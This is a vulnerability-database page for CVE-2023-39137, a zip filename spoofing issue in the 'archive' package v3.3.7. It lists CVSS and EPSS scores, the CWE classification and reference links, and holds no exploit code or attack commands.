Vulnerability Details : CVE-2023-39137
An issue in Archive v3.3.7 allows attackers to spoof zip filenames which can lead to inconsistent filename parsing.
Products affected by CVE-2023-39137
- cpe:2.3:a:archive_project:archive:3.3.7:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2023-39137
0.06%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 26 %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2023-39137
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
7.8
|
HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
1.8
|
5.9
|
NIST |
CWE ids for CVE-2023-39137
-
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.Assigned by: 134c704f-9b21-4f2e-91b3-4a467353bcc0 (Secondary)
References for CVE-2023-39137
-
https://blog.ostorlab.co/zip-packages-exploitation.html
ZIP Exploitation: Critical Vulnerabilities Found in Popular Zip Libraries in Swift and Flutter | Ostorlab: Mobile App Security Testing for Android and iOSExploit
-
https://github.com/brendan-duncan/archive/issues/266
Archive package is vulnerable to zip filename spoofing · Issue #266 · brendan-duncan/archive · GitHubIssue Tracking
-
https://www.rapid7.com/db/modules/exploit/windows/fileformat/winrar_name_spoofing/
WinRAR Filename SpoofingThird Party Advisory
-
https://ostorlab.co/vulndb/advisory/OVE-2023-3
Mobile App Security Testing for Android and iOSExploit
Jump to